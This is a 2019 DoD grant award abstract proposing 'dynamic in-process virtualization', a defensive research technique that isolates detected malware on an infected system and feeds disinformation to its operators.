In-Situ Malware Containment and Deception through Dynamic In- Process Virtualization

Abstract

In-Situ Malware Containment and Deception through DynamicIn-Process VirtualizationThe malware landscape has evolved from the domain of attention-seeking miscreants, into adiverse spectrum ranging from best-effort mass-market malware to highly sophisticated statesponsoredattacks using implants, remote access Trojans, and advanced evasion techniques. Whileexisting research mainly focuses on detection, classification, and prevention of various malwarethreats, this project turns the table on adversaries by using malware infections as a way to feed disinformationto miscreants. Specifically, information-stealing malware opens new deceptive strategiesfor defenders once a malware infection is detected. That is, if the defender can trick malwareto report incorrect information to its author, the defender can launch a disinformation campaign,potentially costing the attacker more resources than a simple removal of a detected malware threatwould inflict.To this end, this project proposes to achieve this disinformation capability through a techniquewe call dynamic in-process virtualization (DIPV). This novel foundational technique is capableof isolating, instrumenting, and deceiving sophisticated malware directly on compromised systemswithout modifying the execution environment. DIPV assumes that a malware infection has beendetected via existing means. However, instead of removing the malware or re-installing the system,DIPV seamlessly creates a dynamic virtualization environment around the identified malwaresample. This environment constitutes a reference monitor that enforces complete mediation on allmemory accesses and API and system call invocations on the virtualized malware sample.To achieve the above-stated goals, DIPV incorporates four distinct and synergistic capabilities:virtualizer injection, dynamic instrumentation, dynamic virtualization, and data semantics recovery.The virtualizer injection component transforms a malware sample such that it includes theadditional code and data required to perform the in-situ dynamic virtualization. Importantly,DIPV can instrument a malware binary either statically before the malware binary is loaded, orinstrument an already executing malware process dynamically at runtime.The dynamic instrumentation is responsible for ensuring that all memory accesses, interactionwith the process environment, and control flow decisions are mediated appropriately. This isessential to DIPV~s capability to disguise its presence from malware.The dynamic virtualization component ensures that malware that verifies its integrity through,for example, cryptographic checksums will read the correct unmodified data. Furthermore, it willensure that any dynamically generated (e.g., unpacked) code will be instrumented to guaranteecomplete mediation.The final component of DIPV is the data semantics recovery. As DIPV aims at feeding disinformationto adversaries, the system has to be able to produce such deliberately wrong information atruntime. To this end, DIPV will include human-guided as well as machine-learning powered mechanismsto provide disinformation that is semantically plausible when received by the adversary.Finally, throughout the DIPV research effort, we will aggregate representative data-sets comprisingcustom-built canonical benign examples and real-world malware samples that we will useto assess the functionality, performance, and accuracy of our DIPV prototype implementation.If successful, DIPV will be a novel design point in the fight against malware. The current practiceof detecting and specifically the removing of malware infections immediately tips off the adversarythat their implant has been detected. With DIPV, the defender has a tool at their disposal thatallows them to feed targeted disinformation to the adversary. If DIPV achieves its design goals,this capability allows defenders to inflict significantly higher costs to adversaries than current antimalwarepractices can.Approved for Public Release

Document Details

Document Type

DoD Grant Award

Publication Date

May 23, 2019

Source ID

N000141912364

Entities

Tags